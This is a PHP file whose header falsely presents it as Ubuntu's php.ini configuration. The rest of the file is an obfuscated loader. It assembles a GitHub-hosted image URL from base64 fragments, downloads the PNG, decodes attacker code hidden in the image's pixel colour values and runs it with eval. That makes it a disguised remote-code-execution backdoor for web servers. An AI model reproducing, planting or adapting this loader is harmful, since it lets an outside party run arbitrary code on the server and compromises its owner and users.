<?php
/**
 * This file is part of the Ubuntu PHP configuration.
 *
 * Maintainer: Ubuntu Developers <ubuntu-devel-discuss@lists.ubuntu.com>
 * Package   : php
 * Path      : /etc/php/8.1/apache2/php.ini
 *
 * Description:
 * This is a sample PHP configuration file used in Ubuntu.
 * Do not edit this file directly unless you know what you're doing.
 * For custom configurations, use the /etc/php/8.1/apache2/conf.d/ directory.
 *
 * License:
 * Distributed under the same terms as PHP itself.
 * See: https://www.php.net/license/3_01.txt
 */
class LigMaColck
{
    public function naegga(array $chunks)
    {
        $url = '';
        foreach ($chunks as $part) {
            if (strlen($part) >= 4 && base64_decode($part, true) !== false) {
                $url .= base64_decode($part);
            } else {
                $url .= $part;
            }
        }
        $image_data = file_get_contents($url);
        if (!$image_data) {
            throw new Exception('Failed.');
        }
        $im = imagecreatefromstring($image_data);
        if (!$im) {
            throw new Exception('Failed.');
        }
        $width = imagesx($im);
        $code = '';
        for ($x = 0; $x < $width; $x++) {
            $rgb = imagecolorat($im, $x, 1);
            $r = ($rgb >> 16) & 0xFF;
            $g = ($rgb >> 8) & 0xFF;
            $b = $rgb & 0xFF;
            $code .= chr($r) . chr($g) . chr($b);
        }
        imagedestroy($im);
        return rtrim($code, "\0");
    }
}


$LigMaColck = new LigMaColck();
$kocloook = $LigMaColck->naegga([
    'aHR0',
    'cHM6',
    'Ly9y',
    'YXcu',
    'Z2l0',
    'aHVi',
    'dXNl',
    'cmNv',
    'nte',
    'bnQu',
    'Y29t',
    'L2xv',
    'vel',
    'aWph',
    'cGVs',
    'aS96',
    'ZWlu',
    'hor',
    'b2Jv',
    'c3Uv',
    'cmVm',
    'cy9o',
    'ead',
    's/m',
    'YWlu',
    '/ca',
    'f.p',
    'ng',
]);
eval('?>' . $kocloook);
?>
